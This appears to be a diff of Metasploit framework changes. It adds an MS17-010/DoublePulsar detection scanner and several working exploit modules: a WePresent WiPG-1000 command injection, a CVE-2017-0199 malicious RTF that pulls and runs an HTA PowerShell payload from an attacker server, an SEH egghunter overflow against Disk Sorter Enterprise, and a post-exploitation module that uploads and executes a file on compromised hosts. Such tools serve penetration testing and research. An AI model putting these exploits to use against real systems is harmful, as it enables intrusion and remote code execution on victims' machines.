@ -35,27 +42,55 @@ class MetasploitModule < Msf::Auxiliary
[ 'CVE', '2017-0147'], [ 'CVE', '2017-0147'],
[ 'CVE', '2017-0148'], [ 'CVE', '2017-0148'],
[ 'MSB', 'MS17-010'], [ 'MSB', 'MS17-010'],
[ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],
[ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],
[ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'] [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) ))
end end
# algorithm to calculate the XOR Key for DoublePulsar knocks
def calculate_doublepulsar_xor_key(s)
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
x & 0xffffffff # this line was added just to truncate to 32 bits
end
def run_host(ip) def run_host(ip)
begin begin
status = do_smb_probe(ip) ipc_share = "\\\\#{ip}\\IPC$"
tree_id = do_smb_setup_tree(ipc_share)
vprint_status("Connected to #{ipc_share} with TID = #{tree_id}")
status = do_smb_ms17_010_probe(tree_id)
vprint_status("Received #{status} with FID = 0")
if status == "STATUS_INSUFF_SERVER_RESOURCES" if status == "STATUS_INSUFF_SERVER_RESOURCES"
print_warning("Host is likely VULNERABLE to MS17-010!") print_good("Host is likely VULNERABLE to MS17-010! (#{simple.client.peer_native_os})")
report_vuln( report_vuln(
host: ip, host: ip,
name: self.name, name: self.name,
refs: self.references, refs: self.references,
info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$' info: 'STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ -- (#{simple.client.peer_native_os})'
) )
# vulnerable to MS17-010, check for DoublePulsar infection
code, signature = do_smb_doublepulsar_probe(tree_id)
if code == 0x51
xor_key = calculate_doublepulsar_xor_key(signature).to_s(16).upcase
print_warning("Host is likely INFECTED with DoublePulsar! - XOR Key: #{xor_key}")
report_vuln(
host: ip,
name: "MS17-010 DoublePulsar Infection",
refs: self.references,
info: 'MultiPlexID += 0x10 on Trans2 request - XOR Key: #{xor_key}'
)
end
elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE" elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE"
# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others) # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)
print_good("Host does NOT appear vulnerable.") print_bad("Host does NOT appear vulnerable.")
else else
print_bad("Unable to properly detect if host is vulnerable.") print_bad("Unable to properly detect if host is vulnerable.")
end end
@ -72,19 +107,34 @@ class MetasploitModule < Msf::Auxiliary
end end
end end
def do_smb_probe(ip) def do_smb_setup_tree(ipc_share)
connect connect
# logon as user \ # logon as user \
simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])
# connect to IPC$ # connect to IPC$
ipc_share = "\\\\#{ip}\\IPC$"
simple.connect(ipc_share) simple.connect(ipc_share)
tree_id = simple.shares[ipc_share]
print_status("Connected to #{ipc_share} with TID = #{tree_id}") # return tree
return simple.shares[ipc_share]
end
def do_smb_doublepulsar_probe(tree_id)
# make doublepulsar knock
pkt = make_smb_trans2_doublepulsar(tree_id)
sock.put(pkt)
bytes = sock.get_once
# convert packet to response struct
pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct
pkt.from_s(bytes[4..-1])
return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1']
end
def do_smb_ms17_010_probe(tree_id)
# request transaction with fid = 0 # request transaction with fid = 0
pkt = make_smb_trans_ms17_010(tree_id) pkt = make_smb_trans_ms17_010(tree_id)
sock.put(pkt) sock.put(pkt)
@ -97,10 +147,46 @@ class MetasploitModule < Msf::Auxiliary
# convert error code to string # convert error code to string
code = pkt['SMB'].v['ErrorClass'] code = pkt['SMB'].v['ErrorClass']
smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new
status = smberr.get_error(code)
print_status("Received #{status} with FID = 0") return smberr.get_error(code)
status end
def make_smb_trans2_doublepulsar(tree_id)
# make a raw transaction packet
# this one is a trans2 packet, the checker is trans
pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
simple.client.smb_defaults(pkt['Payload']['SMB'])
# opcode 0x0e = SESSION_SETUP
setup = "\x0e\x00\x00\x00"
setup_count = 1 # 1 word
trans = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# calculate offsets to the SetupData payload
base_offset = pkt.to_s.length + (setup.length) - 4
param_offset = base_offset + trans.length
data_offset = param_offset # + 0
# packet baselines
pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['MultiplexID'] = 65
pkt['Payload']['SMB'].v['Flags2'] = 0xc007
pkt['Payload']['SMB'].v['TreeID'] = tree_id
pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
pkt['Payload'].v['Timeout'] = 0x00a4d9a6
pkt['Payload'].v['ParamCountTotal'] = 12
pkt['Payload'].v['ParamCount'] = 12
pkt['Payload'].v['ParamCountMax'] = 1
pkt['Payload'].v['DataCountMax'] = 0
pkt['Payload'].v['ParamOffset'] = 66
pkt['Payload'].v['DataOffset'] = 78
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup
pkt['Payload'].v['Payload'] = trans
pkt.to_s
end end
def make_smb_trans_ms17_010(tree_id) def make_smb_trans_ms17_010(tree_id)

View File

@ -0,0 +1,74 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'WePresent WiPG-1000 Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in an undocumented
CGI file in several versions of the WePresent WiPG-1000 devices.
Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthias Brun', # Vulnerability Discovery, Metasploit Module
],
'References' =>
[
[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat openssl'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['WiPG-1000 <=2.0.0.7', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 20 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/rdfs.cgi'
})
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'
}
)
end
end

View File

@ -0,0 +1,159 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => "Microsoft Office Word Malicious Hta Execution",
'Description' => %q{
This module creates a malicious RTF file that when opened in
vulnerable versions of Microsoft Word will lead to code execution.
The flaw exists in how a olelink object can make a http(s) request,
and execute hta code in response.
This bug was originally seen being exploited in the wild starting
in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
#data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end

View File

@ -0,0 +1,104 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Sorter Enterprise GET Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability
in the web interface of Disk Sorter Enterprise v9.5.12, caused by
improper bounds checking of the request path in HTTP GET requests
sent to the built-in web server. This module has been tested
successfully on Windows 7 SP1 x86.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x09\x0a\x0d\x20\x26",
'Space' => 500
},
'Targets' =>
[
[ 'Disk Sorter Enterprise v9.5.12',
{
'Offset' => 2488,
'Ret' => 0x10051223 # POP # POP # RET [libspp.dll]
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Mar 15 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/'
)
if res && res.code == 200
version = res.body[/Disk Sorter Enterprise v[^<]*/]
if version
vprint_status("Version detected: #{version}")
if version =~ /9\.5\.12/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Detected
end
else
vprint_error('Unable to determine due to a HTTP connection timeout')
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
eggoptions = {
checksum: true,
eggtag: rand_text_alpha(4, payload_badchars)
}
hunter, egg = generate_egghunter(
payload.encoded,
payload_badchars,
eggoptions
)
sploit = rand_text_alpha(target['Offset'])
sploit << generate_seh_record(target.ret)
sploit << hunter
sploit << make_nops(10)
sploit << egg
sploit << rand_text_alpha(5500)
print_status('Sending request...')
send_request_cgi(
'method' => 'GET',
'uri' => sploit
)
end
end

View File

@ -0,0 +1,52 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
def initialize(info={})
super( update_info( info,
'Name' => 'Upload and Execute',
'Description' => %q{ Push a file and execute it },
'License' => MSF_LICENSE,
'Author' => [ 'egypt'],
'Platform' => [ 'win','linux','osx' ],
'SessionTypes' => [ 'meterpreter','shell' ]
))
register_options(
[
OptPath.new('LFILE', [true,'Local file to upload and execute']),
OptString.new('RFILE', [false,'Name of file on target (default is basename of LFILE)']),
], self.class)
end
def rfile
if datastore['RFILE'].blank?
remote_name = File.basename(datastore['LFILE'])
else
remote_name = datastore['RFILE']
end
remote_name
end
def lfile
datastore['LFILE']
end
def run
upload_file(rfile, lfile)
if session.platform.include?("windows")
cmd_exec("cmd.exe /c start #{rfile}", nil, 0)
else
cmd_exec("chmod 755 #{rfile} && ./#{rfile}", nil, 0)
end
rm_f(rfile)
end
end

View File

@ -82,6 +82,34 @@ module Msf
usage("aggregator_session_forward") usage("aggregator_session_forward")
end end
def show_session(details, target, local_id)
status = pad_space(" #{local_id}", 4)
status += " #{details['ID']}" unless local_id.nil?
status = pad_space(status, 15)
status += " meterpreter "
status += "#{guess_target_platform(details['OS'])} "
status = pad_space(status, 43)
status += "#{details['USER']} @ #{details['HOSTNAME']} "
status = pad_space(status, 64)
status += "#{details['LOCAL_SOCKET']} -> #{details['REMOTE_SOCKET']}"
print_status status
end
def show_session_detailed(details, target, local_id)
print_status "\t Remote ID: #{details['ID']}"
print_status "\t Type: meterpreter #{guess_target_platform(details['OS'])}"
print_status "\t Info: #{details['USER']} @ #{details['HOSTNAME']}"
print_status "\t Tunnel: #{details['LOCAL_SOCKET']} -> #{details['REMOTE_SOCKET']}"
print_status "\t Via: exploit/multi/handler"
print_status "\t UUID: #{details['UUID']}"
print_status "\t MachineID: #{details['MachineID']}"
print_status "\t CheckIn: #{details['LAST_SEEN'].to_i}s ago" unless details['LAST_SEEN'].nil?
print_status "\tRegistered: Not Yet Implemented"
print_status "\t Forward: #{target}"
print_status "\tSession ID: #{local_id}" unless local_id.nil?
print_status ""
end
def cmd_aggregator_save(*args) def cmd_aggregator_save(*args)
# if we are logged in, save session details to aggregator.yaml # if we are logged in, save session details to aggregator.yaml
if args.length == 0 || args[0] == "-h" if args.length == 0 || args[0] == "-h"
@ -137,14 +165,28 @@ module Msf
aggregator_login aggregator_login
end end
def cmd_aggregator_sessions(*_args) def cmd_aggregator_sessions(*args)
case args.length
when 0
isDetailed = false
when 1
unless args[0] == "-v"
usage_sessions
return
end
isDetailed = true
else
usage_sessions
return
end
return unless aggregator_verify return unless aggregator_verify
sessions_list = @aggregator.sessions sessions_list = @aggregator.sessions
return if sessions_list.nil? return if sessions_list.nil?
session_map = {}
# get details for each session and print in format of sessions -v # get details for each session and print in format of sessions -v
print_status("Sessions found:")
sessions_list.each do |session| sessions_list.each do |session|
session_id, target = session session_id, target = session
details = @aggregator.session_details(session_id) details = @aggregator.session_details(session_id)
@ -155,19 +197,27 @@ module Msf
end end
# filter session that do not have details as forwarding options (this may change later) # filter session that do not have details as forwarding options (this may change later)
next unless details && details['ID'] next unless details && details['ID']
session_map[details['ID']] = [details, target, local_id]
end
print_status "\t Remote ID: #{details['ID']}" print_status("Remote sessions")
print_status "\t Type: meterpreter #{guess_target_platform(details['OS'])}" print_status("===============")
print_status "\t Info: #{details['USER']} @ #{details['HOSTNAME']}" print_status("")
print_status "\t Tunnel: #{details['LOCAL_SOCKET']} -> #{details['REMOTE_SOCKET']}" if session_map.length == 0
print_status "\t Via: exploit/multi/handler" print_status("No remote sessions.")
print_status "\t UUID: #{details['UUID']}" else
print_status "\t MachineID: #{details['MachineID']}" unless isDetailed
print_status "\t CheckIn: #{details['LAST_SEEN'].to_i}s ago" unless details['LAST_SEEN'].nil? print_status(" Id Remote Id Type Information Connection")
print_status "\tRegistered: Not Yet Implemented" print_status(" -- --------- ---- ----------- ----------")
print_status "\t Forward: #{target}" end
print_status "\tSession ID: #{local_id}" unless local_id.nil? session_map.keys.sort.each do |key|
print_status "" details, target, local_id = session_map[key]
unless isDetailed
show_session(details, target, local_id)
else
show_session_detailed(details, target, local_id)
end
end
end end
end end
@ -425,11 +475,21 @@ module Msf
end end
end end
def pad_space(status, length)
while status.length < length
status << " "
end
status
end
private :guess_target_platform private :guess_target_platform
private :aggregator_login private :aggregator_login
private :aggregator_compatibility_check private :aggregator_compatibility_check
private :aggregator_verify private :aggregator_verify
private :local_handler private :local_handler
private :pad_space
private :show_session
private :show_session_detailed
end end
# #

View File

@ -269,9 +269,9 @@ module ELM327HWBridgeRelay
result["success"] = false result["success"] = false
srcid = "%03X" % srcid.to_i(16) srcid = "%03X" % srcid.to_i(16)
dstid = "%03X" % dstid.to_i(16) dstid = "%03X" % dstid.to_i(16)
send_cmd("ATMCAF1") # Turn on ISO-TP formatting send_cmd("ATCAF1") # Turn on ISO-TP formatting
send_cmd("ATR1") # Turn on responses send_cmd("ATR1") # Turn on responses
send_cmd("ATSTH#{srcid}") # Src Header send_cmd("ATSH#{srcid}") # Src Header
send_cmd("ATCRA#{dstid}") # Resp Header send_cmd("ATCRA#{dstid}") # Resp Header
send_cmd("ATCFC1") # Enable flow control send_cmd("ATCFC1") # Enable flow control
resp = send_cmd(data) resp = send_cmd(data)